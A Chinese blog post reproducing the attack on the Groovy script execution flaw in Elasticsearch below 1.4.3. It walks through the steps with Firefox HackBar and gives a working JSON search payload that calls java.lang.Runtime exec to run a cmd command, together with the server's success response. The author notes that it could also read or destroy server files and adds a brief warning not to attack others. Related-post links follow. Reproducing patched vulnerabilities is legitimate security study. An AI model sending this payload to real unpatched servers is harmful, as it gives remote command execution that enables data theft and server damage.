关于elasticsearch1.4.3以下版本安全漏洞的攻击过程复现

最新推荐文章于 2024-07-03 17:23:43 发布
最新推荐文章于 2024-07-03 17:23:43 发布
阅读量1.4k 收藏
点赞数
分类专栏: 全文检索
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/achilles12345/article/details/44276249
版权

     elasticsearch1.4.3以下有几个版本可以执行groovy脚本,这个被利用后可以直接调用widows的cmd命令和linux的shell。网上有一些文章,但是写的不够接地气,这里我复现了这个漏洞的攻击过程,重新写下。

     第一步:安装Firefox的Hackbar插件,安装好好,如图所示:

    


    第二步:在浏览器地址栏敲:http://localhost:9200/_search?pretty,注意这里可以是你自己全文检索服务器的IP和端口号,然后点击回车;

    第三步:选择Enable Post data这个复选框,然后将以下脚本填入Post data选项:

{
   "size":1,
   "script_fields": {
     "test#": {
       "script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cmd /c copy c:\\\\error.txt d:\\\\zhaich.txt \")", "lang":"groovy"
     }
   }
 }

    第四步:单击左侧的“Execute“按钮。

    第五步:查看结果:

{
  "took" : 36,
  "timed_out" : false,
  "_shards" : {
    "total" : 10,
    "successful" : 10,
    "failed" : 0
  },
  "hits" : {
    "total" : 3357,
    "max_score" : 1.0,
    "hits" : [ {
      "_index" : "shopinfo",
      "_type" : "shopinfo",
      "_id" : "0EyqahDXQjSReepWJP2iYw",
      "_score" : 1.0,
      "fields" : {
        "test#" : [ "java.lang.ProcessImpl@7b0a3486" ]
      }
    } ]
  }
}

这代码说明代码执行成功,也就是说如果服务器上运行elasticsearch的用户有多大权限,这个cmd或者shell就能完成多大权限的功能。这里是拷贝记事本,如果是换成读取文件也是可以的,这样就可以获取服务器上的关键文件,也可以摧毁服务器(当然了一般都不会这样搞,岂不是断了自己的”财路“)。

    好了,以上就是基本的攻击攻击过程。希望大家注意,切不要用来攻击别人,可以作安全试验。整个和struts之前的漏洞非常类似。

   参考网址:http://www.2cto.com/Article/201503/381303.html

渭水飞熊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web渗透测试漏洞复现Elasticsearch未授权漏洞复现
HACKONE的博客
03-18 2705
Elasticsearch 是一款 Java 编写的企业级搜索服务,它以分布式多用户能力和全文搜索引擎为特点,采用 RESTful web 接口。这款搜索引擎由 Java 开发,作为 Apache 许可下的开源软件发布,是流行的企业级搜索引擎之一。Elasticsearch 的增删改查操作都通过 http 接口完成。开源的版本可能存在未授权访问漏洞。这意味着攻击者可能获得 Elasticsearch 的所有权限,从而能够对数据进行任意操作。这可能导致业务系统中的敏感数据泄露、数据丢失、数据损坏。
[Vulfocus解题系列]ElasticSearch命令执行漏洞(CVE-2014-3120)
00勇士王子的博客
07-04 1322
漏洞介绍 Elasticsearch 是一个基于 Lucene 库的搜索引擎,具有 HTTP Web 接口和无模式 JSON 文档。Elasticsearch 是用 Java 开发的,其支持 MVEL、js、Java 等语言,其老版本默认语言为 MVEL。 MVEL :一个被众多 Java 项目使用的开源的表达式语言。 Elasticsearch 1.2之前的版本默认配置启用了动态脚本,该脚本允许远程攻击者通过 _search 的 source 参数执行任意 MVEL 表达式和 Java 代码。 影响版本
Windows server系统加固:数据库Elasticsearch未授权访问
最新发布
君逍遥o
07-03 814
加固Windows Server系统中的Elasticsearch以防止未授权访问需要综合考虑多个方面,包括访问控制、安全认证、软件更新、插件管理、监控和日志记录、网络隔离和防火墙设置等。通过实施这些加固措施,可以显著降低Elasticsearch未授权访问的风险,保护数据安全和系统稳定性。请注意,以上措施仅为一般性建议,具体实现时可能需要根据Elasticsearch版本、部署环境和业务需求进行调整。建议在实施任何加固措施之前,先评估其对现有系统和业务的影响,并制定相应的测试计划。
ElasticSearch漏洞复现
qq_63980959的博客
05-19 2727
Elasticsearch 是一个非常强大的搜索引擎。它目前被广泛地使用于各个 IT 公司。Elasticsearch 是由 Elastic 公司创建。它的代码位于 GitHub - elastic/elasticsearch: Free and Open, Distributed, RESTful Search Engine。Elasticsearch 是一个分布式、免费和开放的搜索和分析引擎,适用于所有类型的数据,包括文本、数字、地理空间、结构化和非结构化数据。
Elasticsearch 常见漏洞复现合集
寒星的博客
05-27 9321
Elasticsearch未授权访问 一、漏洞简介 ElasticSearch 是一款Java编写的企业级搜索服务,启动此服务默认会开放HTTP-9200端口,可被非法操作数据。 二、影响版本 ALL 三、复现过程 复现环境 vulhub 复现步骤 安装了river之后可以同步多种数据库数据(包括关系型的mysql、mongodb等)。 http://xxxxxxxx:9200/_cat/indices 里面的indices包含了_river一般就是安装了river了。 http://xxxxxxxx:9.
Spring Boot整合ElasticSearch实现多版本兼容的方法详解
08-27
对于Spring Boot 1.3.5及其以下版本,应使用Spring Data Elasticsearch 1.3.4及以下,对应的Elasticsearch版本不超过1.7.2。而当Spring Boot版本升至1.4.x及以上时,Spring Data Elasticsearch应为2.0.0以上但低于...
elasticsearch-7.17.6及对应版本IK分词
02-19
elasticsearch-7.17.6及对应版本IK分词 适合人群:elasticsearch初学者 Elasticsearch 是位于 Elastic Stack 核心的分布式搜索和分析引擎。Logstash 和 Beats 有助于收集、聚合和丰富您的数据并将其存储在 Elastic...
elasticsearch7.17.10版本分词器插件安装包
11-13
在日志收集和数据分析领域,Elasticsearch(简称ES)扮演着重要的角色。作为一个强大的全文搜索引擎,Elasticsearch允许用户通过简单的API进行数据索引、搜索、分析和可视化。然而,为了更好地处理中文等复杂语言,...
elasticsearch7.17.11版本分词器插件安装包
11-13
Elasticsearch(简称ES)是一款基于Lucene的分布式、RESTful搜索引擎,广泛应用于日志收集、数据分析等领域,是ELK(Elasticsearch、Logstash、Kibana)堆栈的重要组成部分。在处理中文数据时,合理的分词对于提升...
Elasticsearch_1.2漏洞利用工具
05-15
Elasticsearch_1.2漏洞利用工具,可以执行命令,上传文件,浏览文件。
elasticsearch漏洞检测工具V1.0.zip
05-26
elasticsearch漏洞检测工具V1.0.zip
elasticsearch漏洞监测工具
09-17
elastiecsearch 的漏洞检测工具,对于elastiecsearch 在配置上或者版本上存在的问题有很好的检测和利用价值。
elasticsearch 代码执行 (CVE-2014-3120)漏洞复现
weixin_42675091的博客
04-03 321
elasticsearch 代码执行 (CVE-2014-3120)漏洞复现
漏洞复现-CVE-2014-3120-ElasticSearch 命令执行漏洞
Kobalos的博客
10-20 452
漏洞复现-CVE-2014-3120-ElasticSearch 命令执行漏洞 漏洞原理 老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。 知识点普及: 1、Elasticsearch,是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎,基于RESTful web接口。Elasticsearch是用Java语言开发的,并作为Apache许可条款下的开放源码发布,是一种流行的
Elasticsearch 代码执行漏洞
cnbird's blog
05-29 2089
http://xxx.com:9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22import%20java.util.*;\nimport%20java.io
[更新]Elasticsearch 代码执行漏洞利用检测工具
胡杨林
05-26 5346
1. ElasticSearch是一个基于Lucene构建的开源,分布式,RESTful搜索引擎。设计用于云计算中,能够达到实时搜索,稳定,可靠,快速,安装使用方便。 2、Lucene是apache软件基金会4 jakarta项目组的一个子项目,是一个开放源代码的全文检索引擎工具包
Elasticsearch未授权访问漏洞
weixin_46411728的博客
07-03 5770
Elasticsearch未授权访问漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值